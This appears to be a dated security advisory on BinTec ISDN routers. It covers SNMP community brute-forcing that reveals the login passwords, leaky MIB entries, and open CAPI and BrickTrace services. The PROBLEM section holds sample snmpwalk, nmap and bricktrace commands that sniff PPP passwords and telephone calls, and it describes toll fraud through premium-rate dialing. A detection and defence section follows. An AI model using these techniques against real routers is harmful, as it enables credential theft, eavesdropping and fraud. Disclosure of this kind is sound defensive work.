COMMAND

    BinTec router

SYSTEMS AFFECTED

    BinTec ISDN router family

PROBLEM

    Following  is  based  on  TESO  Security  Advisory.  By using SNMP
    brute-force-techniques  for  SNMP  community-names  one is able to
    gain the management accounts passwords, which are the same as  the
    SNMP community  names.   Additionally the  MIB-Tree holds security
    related  information  which  should  not  be  accessible   through
    read-only/SNMP.  These  routers also offer  services which can  be
    abused  rather  easily,  like  dialing  out  and getting full line
    access via a CAPI interface, or a debugging interface which  gives
    you all  information which  is sent  over the  BRI-lines.   (Those
    services are open as default  and the debugging service is  barely
    documented).  This was tested on:

        - BIANCA/BRICK-XL
        - BIANCA/BRICK-XS

    Example system setup for examples given
    =======================================

        admin Login Password/SNMP Community  bitkoenig
        read  Login Password/SNMP Community  rince
        write Login Password/SNMP Community  guenthi

        defaults are: admin/bintec read/public and write/public

    Example of Read-Only SNMP output from a BinTec router
    =====================================================

        syslog:
        bitch:~$ snmpwalk fefe.rookie.lan rince .1.3.6.1.4.1.272.4.1.12.1
        [...]
        enterprises.272.4.1.12.1.4.954440111.7.39 = "citykom-muenster:
         local IP address is 195.202.40.124, remote is 195.202.32.121"
        enterprises.272.4.1.12.1.4.954440116.7.40 =
         "LOGOUT as admin from TELNET 192.168.0.100 at Thu Mar 30 18:15:16 2000"
        enterprises.272.4.1.12.1.4.954440685.7.41 =
         "LOGIN as admin from TELNET 192.168.0.100 at Thu Mar 30 18:24:45 2000"
        enterprises.272.4.1.12.1.4.954440692.7.42 =
         "citykom-muenster: outgoing connection closed, duration 583 sec, 18194
          bytes received, 4934 bytes sent, 6 charging units, 0 charging amounts"
        enterprises.272.4.1.12.1.4.954440692.7.43 =
         "ISDN: 30.03.2000,18:15:08,18:24:52,583,18596,5306,134,124,6 Units,O,,
          609910,7/0,0,0B,citykom-muenster"
        [...]

        capi-user-db:
        bitch:~$ snmpwalk fefe.rookie.lan rince .1.3.6.1.4.1.272.4.7.8.1
        enterprises.272.4.7.8.1.1.7.100.101.102.97.117.108.116.0 = "default"
         /* username */
        enterprises.272.4.7.8.1.2.7.100.101.102.97.117.108.116.0 = ""
         /* password */
        enterprises.272.4.7.8.1.6.7.100.101.102.97.117.108.116.0 = 1
         /* capi access activated */

    Remote CAPI Server on a BinTec router
    =====================================

        fefe:> ps -elf
        [...]
        S     0    26     1  28        0   Jan  1 ?        00:00 00:00 vcapid
        [...]

        Corresponding Port:

        bitch:~# nmap -sS -O -p 6000 poor.brick.de

        Starting nmap V.3.01beta by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
        Interesting ports on poor.brick.de (xxx.xxx.xxx.xxx):
        Port    State       Protocol  Service
        6000    open        tcp        X11

        TCP Sequence Prediction: Class=random positive increments
                            Difficulty=1894 (Medium)

        Remote operating system guess:
        Bintec Brick XS SW Release 4.9.1 ISDN access router

        Nmap run completed -- 1 IP address (1 host up) scanned in 8 seconds

    BrickTrace Server on a BinTec router:
    =====================================

        fefe:> ps -elf
        [...]
        S     0    24     1  28        0   Jan  1 ?        00:04 00:01 traced
        [...]

        Corresponding Port:

        bitch:~# nmap -sS -O -p 7000 poor.brick.de

        Starting nmap V.3.01beta by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
        Interesting ports on poor.brick.de (xxx.xxx.xxx.xxx):
        Port    State       Protocol  Service
        6000    open        tcp        afs3-fileserver

        TCP Sequence Prediction: Class=random positive increments
                            Difficulty=1894 (Medium)

        Remote operating system guess:
        Bintec Brick XS SW Release 4.9.1 ISDN access router

        Nmap run completed -- 1 IP address (1 host up) scanned in 6 seconds

    BrickTracing a password from an outgoing PPP connection
    ========================================================

        bitch:~$ bricktrace -h2pi 1 0 2
        bricktrace: Connected to 192.168.0.1(7000)
        Tracing: Channel 1 Unit 0 Slot 2          /* Tracing the B-Channel */
        [...]
        020721.320 X DATA[0025]
              0000: ff 03 c0 23 01 01 00 15  08 73 68 6f 6c 74 77 69  ...#.....user
              0010: 73 07 72 65 74 68 6f 6f  6f                       .password
                 PPP packet protocol 0xc023 (PAP)
                 ID 1 PAP Authenticate-Request Peer-ID user Password password
            A=FF  UI
        [...]

    Snooping an S0 Bus for telephone calls
    ======================================

        bitch:~$ bricktrace -h3 0 0 2
        bricktrace: Connected to 192.168.0.1(7000)
        Tracing: Channel 0 Unit 0 Slot 2        /* Tracing the D-Channel */
        [...]
        021096.656 R DATA[0015]
              0000: 02 b3 10 1a 08 01 81 0d  18 01 89 1e 02 82 88 ...............
                PD=08 Dest CR=01  SETUP ACKNOWLEDGE
                    IE-Element  : Channel Identification :
                                  Interface implicitly identified
                                  Interface type S0
                                  Channelnumber is exclusive (accept only this)
                                  Identified Channel is not D-Channel
                                  Selected Channel : B1-Channel
                    IE-Element  : Progress Indicator reports
                                  In-band information now available
        [...]
        021105.366 R DATA[0008]
              0000: 02 b3 12 2e 08 01 81 02                           ........
                PD=08 Dest CR=01  CALL PROCEEDING
        021108.076 R DATA[0012]
              0000: 02 b3 14 2e 08 01 81 01  1e 02 82 88              ............
                PD=08 Dest CR=01  ALERT
                    IE-Element  : Progress Indicator reports
                                  In-band information now available
        [...]
        021124.748 R DATA[0028]
              0000: 02 b3 16 2e 08 01 81 07  29 05 00 03 1e 12 23 4c  ........).....#L
              0010: 0b 21 83 31 33 30 31 31  32 31 31 32              .!.130112112
                PD=08 Dest CR=01  CONNECT
                    IE-Element  : Date yy.mm.dd-hh:mm : 0.3.30-18:35:134597435
                    IE-Element  : Unknown IE-Element 0x4c in Codeset 0
        [...]
        021130.282 R DATA[0045]
              0000: 02 b3 1a 32 08 01 81 4d  1c 16 91 a1 13 02 02 c4   ...2...M........
              0010: 37 02 01 22 30 0a a1 05  30 03 02 01 00 82 01 01   7.."0...0.......
              0020: 28 0b 30 20 45 69 6e 68  65 69 74 65 6e            (.0 Einheiten
                 PD=08 Dest CR=01  RELEASE
                     IE-Element  : Facility
                                   Service discriminator is supplement. application
                                   Component tag is invoke
                                     integer (0x2)
                                     50231
                                     integer (0x1)
                                     34
                                     sequence (0xa)
                                     {
                                         GetNextRequest (0x5)
                                         {
                                             sequence (0x3)
                                             {
                                                 integer (0x1)
                                                 0
                                             }
                                         }
                                         GetResponse (0x1)

                                     }


                     IE-Element  : Display                : 0 Einheiten
        [...]

    Checking line status from BinTec's httpd:
    =========================================

        [...]
        Hardware Interfaces

           Slot 1 Ethernet o.k.
           Slot 2 ISDN S2M o.k. used 13, available 17
           - - X X X X X - X -
           - - X - X - - X - -
           X - - - X - - X - X
           [...]

           now we know what to sniff:
           sniffing an inbound ppp connection on line 4 slot 2:

           bitch:~$ bricktrace -h2pit 4 0 2
           bricktrace: Connected to aaa.bbb.ccc.ddd(7000)
           Tracing: Channel 4 Unit 0 Slot 2
           [...]
           004419.999 X DATA[0045]
                 0000: 21 45 00 00 2c 39 07 40  00 3e 06 f5 cc c2 61 44 !E..,9.@.>....aD
                 0010: 0d c2 61 45 28 00 50 da  79 bc f8 a9 a7 02 2b c5 ..aE(.P.y.....+.
                 0020: 7a 60 12 44 70 3c                                z.Dp<
                     Compressed PPP packet protocol 0x21 (TCP/IP)
                A=21  RNR  P/F=0 N(R)=2

                     IP-Packet from aaa.bbb.ccc.ddd to a.b.c.d  protocol 0x6
                     TCP-Message, sourceport 80 destinationport 55929
                                  sequence number 3170412967
                                  acknowledgement number 36423034
                                  offset 6 flags ACK SYN
                                  window 17520 checksum 0x3c9e urgent 0
           [...]
           004420.640 R DATA[0609]
                 0000: 2d 70 0e b0 43 ff 47 45  54 20 68 74 74 70 3a 2f  -p..C.GET http:/
                 0010: 2f 63 68 61 74 33 2e 70  6c 61 79 67 72 6f 75 6e /chat3.playgroun
                 0020: 64 2e 64 65 2f 63                                 d.de/c
                     Compressed PPP packet protocol 0x2d (VJ Compressed TCP/IP)
                A=2D  I    P/F=1 N(R)=3 N(S)=0
                        0E B0 C  FF G  E  T     h  t  t  p  :  /  /  c  h  a  t  3
                           .  p  l  a  y  g  r  o  u  n  d  .  d  e  /  c  h  a  t
                     IP-Packet from a to b protocol 0x2f
           [...]

    Impact is following:

    (1) SNMP communities / login passwords
        By  using  standard  brute-force  methods,  the SNMP community
        string, and therefore the  login's passwords can be  obtained.
        A program doing this is  for example ADMsnmp, which has  to be
        feeded  by  a  wordlist.   Bruteforcing  this  way  is   quite
        effective, you get  about 500-1000 words  per minute.   (which
        of course depends on your  and the routers connectivity)   You
        can get this program from

          ftp://adm.freelsd.net/pub/ADM/ADMsnmp.0.1.tgz

        Bruteforcing the passwords directly via telnet isn't  possible
        because the router slows down after approx.  6 tries.

    (2) Using the CAPI facility
        Nearly  any  router  can   remotely  be  used  as   'ISDN-Line
        provider' - you  can use the  BRI-Lines of the  router if they
        are not password protected.   While doing a short survey  most
        machines we encountered were proven to be vulnerable, so  they
        didn't have any restrictions set.  The CAPI daemon listens  on
        port  6000  as  you  can  see  in  the  'Tests' section.  This
        feature can,  for example  be exploited  by dialing  expensive
        numbers (0900 or 0190 [in DE] lines).  You may also hide  your
        real identity by  calling a 'call-by-call'  ISP who gives  you
        another IP you  can deal with.    A (R)CAPI  library for  Un*x
        exists, which can be used for these attacks.  It is  available
        via

          ftp://ftp.bintec.de/pub/brick/libcapi/

        There is also a CAPI  user interface for MS Windows,  which is
        called Brickware and can be obtained via

          ftp://ftp.bintec.de/pub/brick/brickware/

        Firmware before  5.1.x seems  to be  generally not passworded,
        TESO did not checked 5.1.x yet.

    (3) Using BrickTrace for snooping BRI-Lines
        You can  gain information  of the  ISP or  corporation running
        these routers with open BrickTrace ports (Port 7000,  default)
        with a program called bricktrace, which is available via

          ftp://ftp.bintec.de/pub/brick/unixtool/

        In  the  documentation  this  port  isn't even stated (!). See
        'Solution' for how to turn off this port.  As you can see  the
        whole  data  passing  the  line,  so  you  also  get the users
        passwords and  see what  they do  in the  net (it  is in a way
        like a dedicated sniffer).   Using this technique of  sniffing
        you  may  also  see  private  information of corporations, not
        only  restricting  you  to   Internet  traffic  but  also   on
        'intranet'  lines  that  use  the  same  router,  as  well  as
        telephony networks (S0 bus).

    The  bug-discovery  and  the  demonstration  are  due  to  Stephan
    Holtwisch.

SOLUTION

    1. Detecting and defending SNMP-Brute Force Access
    ==================================================
    Scanning the management account passwords of a Bintec Router  with
    a brute force attack via SNMP access can be detected and prevented
    in the following ways:

    Detection:
      Every system access with an invalid management account  password
      is detected  by the  router and  logged (local,  via console and
      via syslog to one or more external hosts).  In addition to that,
      SNMP requests  with illegal  community passwords  cause an  SNMP
      Trap.

    Defense:
      We recommend using one or more of the following three methods to
      deny SNMP access  from untrusted WAN  interfaces or to  restrict
      SNMP access to trusted IP addresses.
      a) Use of Network Address Translation.
         The use of NAT will  allow outgoing connections but deny  any
         incoming  connections  from  hosts  on  the other side of the
         WAN interface.  This is  also the  default configuration  for
         internet access,  when the  Bintec Router  is configured  via
         the Wizard.   Bintec routers  also can  offer a  special  NAT
         mode  without  Address  Translation,  i.e.  packets traveling
         through  the  router  are  not  modified but connections from
         outside are still denied.

      b) Use of Access Lists
         Filters and access lists can be defined for every  interface.
         They  can  be  used  to  grant  access  to local services via
         trusted IP addresses and/or trusted interfaces only, and deny
         the access to all others.

      c) Use of "Local Service" Access Lists
         There are also two SNMP  tables on the system to  specify the
         trusted  IP  addresses  to  connect  to  any  local   service
         (localtcpallowtable  and  localudpallowtable).   These tables
         are easier to handle and set up than access lists.  Beginning
         with release 5.2.1, this configuration will be accessible via
         the built-in SETUP-Tool.


    2. Defending SNMP Access to security related information
    ========================================================
    To  defend  SNMP-Access  to  security  related  information in the
    private MIBs,  the SNMP  access has  to be  restricted.   Again we
    recommend using  one or  more of  the three  methods mentioned  in
    section 1a) to 1c)


    3. Detecting and Defending abuse of other local services
    ========================================================
    The abuse of  other local services  like CAPI, TAPI  and TRACE can
    be detected and prevented in the following ways:

    Detection:
      Every CAPI,  TAPI and  trace connection  is detected  and logged
      (local,  via  console  and  via  syslog  to one or more external
      hosts).   The syslog  includes timestap,  source IP address/port
      and type of service.  If connections are established or accepted
      via CAPI and/or TAPI, the timestamp, duration, number,  charging
      information are logged  together with source  IP address of  the
      TAPI/CAPI-user.

    Defense:
      We recommend using  one or more  of the following  three methods
      mentioned in  section 1a)  to 1c)  to defend  CAPI/TAPI or TRACE
      access from untrusted WAN  interfaces or to restrict  the access
      to trusted IP addresses.